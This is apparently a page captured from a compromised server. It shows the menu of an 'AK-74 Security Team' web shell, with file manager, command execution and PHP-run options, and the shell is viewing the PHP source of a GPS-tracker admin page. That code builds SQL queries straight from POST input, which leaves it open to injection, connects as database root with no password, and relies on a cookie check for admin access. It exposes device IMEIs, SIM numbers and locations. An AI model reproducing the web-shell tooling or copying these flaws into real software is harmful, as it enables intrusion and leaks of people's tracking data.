.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<?php $user = $_POST['user']; $select2 = "select gs_trackers.dt_tracker,gs_trackers.imei,gs_trackers.speed,gs_user_trackers.user_id,gs_user_trackers.device,gs_user_trackers.sim_number,gs_user_trackers.`name` FROM gs_trackers INNER JOIN gs_user_trackers ON gs_trackers.imei=gs_user_trackers.imei WHERE gs_user_trackers.user_id IN( SELECT gs_users.id from gs_users WHERE gs_users.username ='" . $user . "' ) ORDER BY gs_trackers.dt_tracker DESC "; $select="select gut.group_id,gu.username,gu.price,gu.price,gt.dt_tracker,gt.lat,gt.lng,gt.imei,gt.speed,gt.device,gt.name,gt.sim_number FROM gs_objects as gt INNER JOIN gs_user_objects as gut ON gt.imei=gut.imei INNER JOIN gs_users as gu ON gu.id=gut.user_id WHERE gu.username='" . $_POST['user'] . "' ORDER BY gt.dt_tracker DESC"; $con = mysqli_connect("localhost", "root", "", "gs"); $result = mysqli_query($con, $select); $body = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>' . $user . '</title> </head><body>'; if($_COOKIE['username']!='admin') header('Location: index.php'); echo $body; echo '<B>' . $user . '</B>'; $user_id = array(); $index = 0; $sqlstr = "SELECT gs_users.id from gs_users WHERE gs_users.username ='" . $user . "'"; $con = mysqli_connect("localhost", "root", "", "gs"); $result2 = mysqli_query($con, $sqlstr); while ($row2 = mysqli_fetch_array($result2)) { // loop to give you the data in an associative array so you can use it however. $user_id[$index] = $row2['id']; $index++; } if(!empty($user_id[0])){ ?> <input type="button" onclick="tableToExcel('dvData', 'Digitalmap')" value="Export to Excel"> <input type="button" onclick="userDelete('<?php echo $user_id[0]; ?>');" value="Delete <?php echo $user; ?>"> <? } echo "<table border='1' id='dvData'> <tr> <th>Date</th> <th>imei</th> <th>speed</th> <th>device</th> <th>sim_no</th> <th>name</th> </tr>"; while ($row = mysqli_fetch_array($result)) { echo "<tr>"; echo "<td>" . $row['dt_tracker'] . "</td>"; echo "<td>" . $row['imei'] . "</td>"; echo "<td>" . $row['speed'] . "</td>"; echo "<td>" . $row['device'] . "</td>"; echo "<td>" . $row['sim_number'] . "</td>"; echo "<td>" . $row['name'] . "</td>"; echo "</tr>"; } echo "</table></body></html>"; mysqli_close($con); ?> <script src="http://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script> <script type="text/javascript"> var tableToExcel = (function() { var uri = 'data:application/vnd.ms-excel;base64,' , template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines/></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--></head><body><table>{table}</table></body></html>' , base64 = function(s) { return window.btoa(unescape(encodeURIComponent(s))) } , format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = {worksheet: name || 'Worksheet', table: table.innerHTML} window.location.href = uri + base64(format(template, ctx)) } })() function userDelete(id) { var answer = confirm('سوف تقوم بحذف المستخدم بكافة مشتملاته'); if (answer) { var data = { cmd: 'user_delete', id: id }; $.ajax({ type: "POST", url: "delete.php", data: data, success: function(result) { if (result == 'ok') { alert('تم الحذف'); } else { alert('فشل الحذف'); } } }); } } </script>
Rename:
-